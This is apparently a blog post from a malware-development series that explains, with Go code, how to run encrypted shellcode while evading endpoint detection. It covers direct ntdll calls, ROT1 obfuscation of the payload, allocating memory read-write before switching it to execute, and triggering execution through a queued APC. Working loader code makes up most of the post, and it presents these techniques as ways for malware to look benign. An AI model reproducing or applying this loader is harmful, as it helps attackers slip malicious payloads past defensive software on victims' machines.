Low-level APIs, APC, and Memory Protection Techniques

Introduction

In this article, I'm going to look at several ways to make a program's execution flow more stealthy. Since these concepts are already well-documented basics, I'll skim over them to briefly explain the basic concepts of APCs, low level APIs, and memory protection management.

Why Use Low level API Instead of Windows "basic" API?

Traditional malware relies on the Windows "user" API for operations like memory allocation, code execution, and threading. However, modern defensive solutions, such as Endpoint Detection and Response (EDR) systems, monitor these APIs extensively. API hooks, logging, and behavioral analysis are common detection mechanisms employed by these tools.

Low-level APIs bypass the Windows "user" API layer and directly invoke kernel functions, reducing observable traces (without totally avoiding it of course). Here is our approach in this post:

Reduce API hooks: Many monitoring tools rely on hooking user-mode APIs, a layer skipped by low-level APIs.
Minimizes logging: Low-level APIs usage doesn’t interact with user-level libraries like user32.dll in the same way, avoiding typical log entries.

The code leverages Low-level APIs for memory allocation, protection modification, and APC queuing using functions like NtAllocateVirtualMemory, NtProtectVirtualMemory, and NtQueueApcThread.

What Is APC and why Is It superior for execution?

Asynchronous Procedure Calls (APC) provide a mechanism for executing code asynchronously in the context of an existing thread. In malware development, APC is a stealthy alternative to creating new threads for execution. Here’s why:

Blends into Normal Behavior: APC execution is a common Windows feature, reducing anomalies in thread activity.
Minimizes New Thread Creation: Creating new threads can trigger behavioral detection mechanisms.
Flexible Timing: APCs execute when the target thread enters an alertable state, offering precise timing control.

In this example, APC is used to queue the shellcode for execution in the context of the current thread, ensuring minimal deviation from legitimate thread activity.

Why using a "two-step" memory allocation ?

Memory allocation with one step executable permissions (directly allocate it with PAGE_EXECUTE_READWRITE) is a well-known red flag for modern defensive systems. Instead, malware can mimic legitimate application behavior by:

Allocating memory with PAGE_READWRITE.
Writing the shellcode into memory.
Changing the memory protection to PAGE_EXECUTE_READ.

This multi-step approach reduces detection risks by avoiding suspicious memory allocation patterns. Defensive tools often look for directly executable memory regions as indicators of malicious activity. Transitioning permissions after writing the payload mirrors the behavior of legitimate applications.

Step-by-step breakdown

Here’s a detailed explanation of the Go code’s key components, focusing on syscall usage, memory operations, and APC execution.

1. Loading Libraries and Resolving Syscalls

var (
    ntdll                   = syscall.NewLazyDLL("ntdll.dll")
    ntAllocateVirtualMemory = ntdll.NewProc("NtAllocateVirtualMemory")
    ntProtectVirtualMemory  = ntdll.NewProc("NtProtectVirtualMemory")
    ntQueueApcThread        = ntdll.NewProc("NtQueueApcThread")
    kernel32                = syscall.NewLazyDLL("kernel32.dll")
    openThread              = kernel32.NewProc("OpenThread")
    sleepEx                 = kernel32.NewProc("SleepEx")
    getCurrentThreadId      = kernel32.NewProc("GetCurrentThreadId")
)

The code dynamically loads system libraries and resolves necessary syscalls. This method enables syscall invocation while maintaining portability and adaptability, even if it's stay relatively high-level

2. Decrypting the Shellcode

func rot1Decrypt(input []byte) []byte {
    decrypted := make([]byte, len(input))
    for i, b := range input {
        decrypted[i] = b - 1
    }
    return decrypted
}

The shellcode is encrypted using a simple ROT1 cipher and decrypted at runtime. This obfuscation protects the payload during static analysis, adding a layer of stealth.

3. Opening the Current Thread

threadID, _, _ := getCurrentThreadId.Call()
thread, _, err := openThread.Call(THREAD_SET_CONTEXT, 0, threadID)
if thread == 0 {
    panic(fmt.Sprintf("OpenThread failed: %v", err))
}
fmt.Printf("Opened thread with handle: 0x%x\n", thread)

The malware retrieves the current thread’s ID and opens it with sufficient permissions. This step is critical for queuing an APC to execute the shellcode.

4. Allocating Memory

var baseAddress uintptr
size := uintptr(len(data))
ntStatus, _, _ := ntAllocateVirtualMemory.Call(
    uintptr(proc),
    uintptr(unsafe.Pointer(&baseAddress)),
    0,
    uintptr(unsafe.Pointer(&size)),
    MEM_COMMIT|MEM_RESERVE,
    PAGE_READWRITE,
)
if ntStatus != STATUS_SUCCESS {
    panic(fmt.Sprintf("NtAllocateVirtualMemory failed with status: 0x%x", ntStatus))
}
fmt.Printf("Memory allocated at: 0x%x\n", baseAddress)

Memory is allocated using NtAllocateVirtualMemory with PAGE_READWRITE permissions, ensuring that the initial allocation avoids detection triggers.

5. Writing the Shellcode

for i, b := range data {
    *(*byte)(unsafe.Pointer(baseAddress + uintptr(i))) = b
}
fmt.Println("Shellcode written to memory")

The decrypted shellcode is written into the allocated memory space. This step ensures the payload is ready for execution.

6. Changing Memory Protection

oldProtect := PAGE_READWRITE
ntStatus, _, _ = ntProtectVirtualMemory.Call(
    uintptr(proc),
    uintptr(unsafe.Pointer(&baseAddress)),
    uintptr(unsafe.Pointer(&size)),
    PAGE_EXECUTE_READ,
    uintptr(unsafe.Pointer(&oldProtect)),
)
if ntStatus != STATUS_SUCCESS {
    panic(fmt.Sprintf("NtProtectVirtualMemory failed with status: 0x%x", ntStatus))
}
fmt.Println("Memory protection changed to PAGE_EXECUTE_READ")

Once the shellcode is in memory, NtProtectVirtualMemory changes the protection to PAGE_EXECUTE_READ, mimicking legitimate behavior.

7. Queueing an APC

ntStatus, _, _ = ntQueueApcThread.Call(
    thread,
    baseAddress,
    0,
    0,
    0,
)
if ntStatus != STATUS_SUCCESS {
    panic(fmt.Sprintf("NtQueueApcThread failed with status: 0x%x", ntStatus))
}
fmt.Println("APC queued successfully")

An APC is queued to the opened thread, pointing to the allocated shellcode. This step ensures execution within the thread context.

8. Triggering APC Execution

sleepEx.Call(0, 1) // SleepEx(0, TRUE) puts the thread in an alertable state, triggering the APC

The SleepEx function sets the thread to an alertable state, triggering the APC and executing the shellcode.

Conclusion

In this article, we succeeded to ue stealthier methods than the methods previously described like low-level, APC, and multi-steps memomry management. By exploring these methods step by step, we demonstrated how we can be look more begnin.

Take note that this code is still high-level and not strong enough to fight advanced security solutions like EDRs... 👀

The full code is available here

PreviousRuntime stealthness NextPPID Spoofing

Last updated 8 months ago